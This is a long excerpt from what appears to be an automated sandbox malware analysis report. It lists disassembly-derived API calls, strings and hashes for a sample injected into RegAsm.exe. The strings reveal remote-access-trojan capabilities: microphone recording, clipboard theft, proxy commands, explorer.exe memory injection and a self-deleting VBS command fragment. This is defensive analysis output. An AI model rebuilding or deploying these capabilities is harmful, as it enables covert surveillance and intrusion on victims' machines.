                                                                • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                • API String ID: 1913171305-3159800282
                                                                • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                                                                • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                                • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                                • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                                APIs
                                                                  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                                                • GetLastError.KERNEL32 ref: 00455D6F
                                                                • __dosmaperr.LIBCMT ref: 00455D76
                                                                • GetFileType.KERNEL32(00000000), ref: 00455D82
                                                                • GetLastError.KERNEL32 ref: 00455D8C
                                                                • __dosmaperr.LIBCMT ref: 00455D95
                                                                • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                                • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                                • GetLastError.KERNEL32 ref: 00455F31
                                                                • __dosmaperr.LIBCMT ref: 00455F38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                                • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: \&G$\&G$`&G
                                                                • API String ID: 269201875-253610517
                                                                • Opcode ID: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                                • Opcode Fuzzy Hash: 4c79e0627c8f19053a14b01c9d065665146560bb3788e30f1103ba49badb8175
                                                                • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 65535$udp
                                                                • API String ID: 0-1267037602
                                                                • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                • __dosmaperr.LIBCMT ref: 0043A926
                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                • __dosmaperr.LIBCMT ref: 0043A963
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                • _free.LIBCMT ref: 0043A9C3
                                                                • _free.LIBCMT ref: 0043A9CA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                • String ID:
                                                                • API String ID: 2441525078-0
                                                                • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                • TranslateMessage.USER32(?), ref: 0040557E
                                                                • DispatchMessageA.USER32(?), ref: 00405589
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                • API String ID: 2956720200-749203953
                                                                • Opcode ID: 61777b78d13ae972d202e0e0494eb207e9581ea4d3c00321eb55f2570f667da8
                                                                • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                • Opcode Fuzzy Hash: 61777b78d13ae972d202e0e0494eb207e9581ea4d3c00321eb55f2570f667da8
                                                                • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                APIs
                                                                  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                                • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                • String ID: 0VG$0VG$<$@$Temp
                                                                • API String ID: 1704390241-2575729100
                                                                • Opcode ID: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                APIs
                                                                • OpenClipboard.USER32 ref: 0041697C
                                                                • EmptyClipboard.USER32 ref: 0041698A
                                                                • CloseClipboard.USER32 ref: 00416990
                                                                • OpenClipboard.USER32 ref: 00416997
                                                                • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                • CloseClipboard.USER32 ref: 004169BF
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                • String ID: !D@
                                                                • API String ID: 2172192267-604454484
                                                                • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                • String ID:
                                                                • API String ID: 221034970-0
                                                                • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                APIs
                                                                • _free.LIBCMT ref: 100059EA
                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                • _free.LIBCMT ref: 100059F6
                                                                • _free.LIBCMT ref: 10005A01
                                                                • _free.LIBCMT ref: 10005A0C
                                                                • _free.LIBCMT ref: 10005A17
                                                                • _free.LIBCMT ref: 10005A22
                                                                • _free.LIBCMT ref: 10005A2D
                                                                • _free.LIBCMT ref: 10005A38
                                                                • _free.LIBCMT ref: 10005A43
                                                                • _free.LIBCMT ref: 10005A51
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                APIs
                                                                • _free.LIBCMT ref: 004481B5
                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 004481C1
                                                                • _free.LIBCMT ref: 004481CC
                                                                • _free.LIBCMT ref: 004481D7
                                                                • _free.LIBCMT ref: 004481E2
                                                                • _free.LIBCMT ref: 004481ED
                                                                • _free.LIBCMT ref: 004481F8
                                                                • _free.LIBCMT ref: 00448203
                                                                • _free.LIBCMT ref: 0044820E
                                                                • _free.LIBCMT ref: 0044821C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Eventinet_ntoa
                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                • API String ID: 3578746661-3604713145
                                                                • Opcode ID: d74f472e9819a2ca06af66e5a0de2ffbe1272e302505ed4d741baebf2c1be1ae
                                                                • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                • Opcode Fuzzy Hash: d74f472e9819a2ca06af66e5a0de2ffbe1272e302505ed4d741baebf2c1be1ae
                                                                • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                APIs
                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DecodePointer
                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                • API String ID: 3527080286-3064271455
                                                                • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                • API String ID: 1462127192-2001430897
                                                                • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                • API String ID: 2050909247-4242073005
                                                                • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                APIs
                                                                • _strftime.LIBCMT ref: 00401D50
                                                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                • API String ID: 3809562944-243156785
                                                                • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                • int.LIBCPMT ref: 00410EBC
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                  • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                • String ID: ,kG$0kG
                                                                • API String ID: 3815856325-2015055088
                                                                • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                • waveInStart.WINMM ref: 00401CFE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
